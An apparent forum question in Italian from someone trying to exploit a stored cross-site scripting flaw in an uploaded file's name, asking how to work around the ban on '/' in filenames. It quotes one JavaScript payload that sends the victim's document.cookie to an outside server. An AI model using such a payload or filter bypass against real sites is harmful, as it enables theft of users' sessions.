Sto cercando di sfruttare una vulnerabilità nel campo del nome file di un caricamento di file. L'applicazione Web non convalida correttamente il nome file del file caricato e, di conseguenza, esiste una vulnerabilità di scripting tra siti memorizzata.
Il mio problema è che ogni volta che provo a rinominare il file per includere qualcosa come il payload sottostante, non posso includere /
nel nome del file.
document.location='http://my_test_server.com/bla.php?cookie='+document.cookie;
Qualche idea / carico utile? È persino possibile sfruttare questa vulnerabilità?